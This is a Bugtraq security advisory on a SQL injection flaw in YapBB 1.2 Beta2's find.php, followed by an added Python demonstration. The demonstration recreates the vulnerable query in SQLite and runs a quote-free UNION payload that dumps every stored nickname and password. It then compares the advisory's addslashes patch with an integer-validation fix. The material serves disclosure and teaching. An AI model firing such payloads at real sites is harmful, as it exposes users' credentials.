Message-ID: <20060515201934.17169.qmail@securityfocus.com>
Date: 15 May 2006 20:19:34 -0000
From: geinblues@...il.com
To: bugtraq@...urityfocus.com
Subject: YapBB <= 1.2 Beta2 'find.php' SQL Injection Vulnerability



Title : YapBB <= 1.2 Beta2 'find.php' SQL Injection Vulnerability

------------------------------------------
Author : x90c(Kyong Joo, Jung)
Published : 2006.5.16
E-mail : geinblues [at] gmail.com
Site : http://www.chollian.net/~jyj9782
------------------------------------------

0x01 Summary

 YapBB is an open-source web forum written in PHP.
 (http://sourceforge.net/projects/yapbb)

 The application is vulnerable to SQL injection in find.php: the userID
 request parameter is interpolated unquoted into a query, so a malicious
 attacker can read every nickname (id) and password stored by YapBB.
 Because the value sits in a numeric context (no surrounding quotes), the
 injection works even with magic_quotes_gpc enabled, since escaping quote
 characters does nothing to a payload that contains none.

 Let's look at the code.


0x02 Testbed

	- Fedora Core 2
	- MySQL-Server 5.0.19-log
	- Php5 ( magic_quotes_gpc = On )


0x03 Codes

~/YapBB-1.2-Beta2/YapBB/find.php:
-
..
34: $userBool = $HTTP_POST_VARS["choice"]=="user";  // if choice == 'user'
36: $userpostBool = !empty($HTTP_GET_VARS["userID"]); // userID == '[inject sql]'
..
119: else if ($userpostBool)
120: {
128:	$postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " . 
        $cfgDatabase['post'] . " AS p, " . $cfgDatabase['topic'] . " AS t, " . 
	$cfgDatabase['user'] . " AS u WHERE t.id = p.topicid AND p.posterid = $userID AND 
	u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50");   // execute sql!
-

	No words.


I wrote an exploit for getting all YapBB users' nicknames and passwords.
Sorry, I can't put the exploit in this advisory =)


0x04 Exploit

[x90c@...kzen testbed]$ whoami
x90c
[x90c@...kzen testbed]$


0x05 Patch

~/YapBB-1.2-Beta2/YapBB/find.php:
..
128: $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " . 
     $cfgDatabase['post'] . " AS p, " . $cfgDatabase['topic'] . " AS t, " . $cfgDatabase['user'] . 
     " AS u WHERE t.id = p.topicid AND p.posterid = '" . addslashes($userID) . 
     "' AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50");       // x90c patch!
..
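The following is an added worked example, not YapBB's code and not part of the original advisory. It rebuilds the find.php line 128 query against an in-memory SQLite copy of the three tables it touches, shows that a quote-free UNION payload in the unquoted userID position dumps every nickname/password pair even after magic_quotes_gpc-style escaping, and then compares the advisory's patch (quotes plus addslashes) with a validate-then-bind fix. The table names (post, topic, user, normally read from $cfgDatabase), the user.password column and the sample rows are assumptions constructed for the demonstration.

```python
import sqlite3

# Constructed sample data standing in for a tiny YapBB installation.
# Table/column names beyond those visible in the advisory's query are assumed.
SCHEMA = """
CREATE TABLE user  (id INTEGER PRIMARY KEY, nickname TEXT, password TEXT);
CREATE TABLE topic (id INTEGER PRIMARY KEY, description TEXT);
CREATE TABLE post  (id INTEGER PRIMARY KEY, topicid INTEGER,
                    posterid INTEGER, date INTEGER);
INSERT INTO user  VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
INSERT INTO topic VALUES (10, 'Welcome'), (11, 'Bugs');
INSERT INTO post  VALUES (100, 10, 1, 1147723174), (101, 11, 2, 1147723200);
"""

# The query from find.php line 128 with the $userID position marked {uid}.
QUERY = ("SELECT p.date, t.id, t.description, u.nickname "
         "FROM post AS p, topic AS t, user AS u "
         "WHERE t.id = p.topicid AND p.posterid = {uid} AND u.id = p.posterid "
         "GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50")

# Attacker-controlled ?userID= value.  It contains no quote characters, so
# addslashes()/magic_quotes_gpc leave it untouched; the UNION appends every
# nickname/password pair and the trailing /* comments out the rest of the query.
PAYLOAD = "-1 UNION SELECT 1, 2, nickname, password FROM user /*"


def connect():
    """Fresh in-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def addslashes(s):
    """Emulates PHP addslashes(), i.e. what magic_quotes_gpc did to GET data."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def run_vulnerable(db, user_id):
    """find.php as shipped: $userID interpolated unquoted into a numeric context."""
    return db.execute(QUERY.format(uid=addslashes(user_id))).fetchall()


def run_advisory_patch(db, user_id):
    """The advisory's fix: wrap the value in quotes and addslashes() it.

    This stops the payload because the quotes turn it into a plain string
    literal that matches no posterid.  Caveat: backslash escaping is MySQL's
    convention; SQLite ignores backslashes, so in this emulation only values
    without quote characters are exercised.  Prefer run_hardened()."""
    return db.execute(QUERY.format(uid="'" + addslashes(user_id) + "'")).fetchall()


def run_hardened(db, user_id):
    """Preferred fix: userID is an integer, so reject anything else, then bind it."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("userID must be an integer")
    return db.execute(QUERY.format(uid="?"), (uid,)).fetchall()


def leaked_credentials(db):
    """(nickname, password) pairs the payload exposes through the vulnerable query."""
    return sorted(row[2:] for row in run_vulnerable(db, PAYLOAD))


if __name__ == "__main__":
    db = connect()
    print("legitimate userID=1:", run_vulnerable(db, "1"))
    print("payload, vulnerable :", leaked_credentials(db))
    print("payload, patched    :", run_advisory_patch(db, PAYLOAD))
    try:
        run_hardened(db, PAYLOAD)
    except ValueError as err:
        print("payload, hardened   :", err)
```

Run as a script it prints alice's legitimate post row, then both users' credentials from the vulnerable query, an empty result from the patched query, and the validation error from the hardened one. The hardened variant is the one to carry into the real code: casting to an integer (intval() in PHP) or binding a parameter removes any dependence on magic_quotes or on database-specific escaping rules.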




Thanks!


- Blu3h4t Team in Korea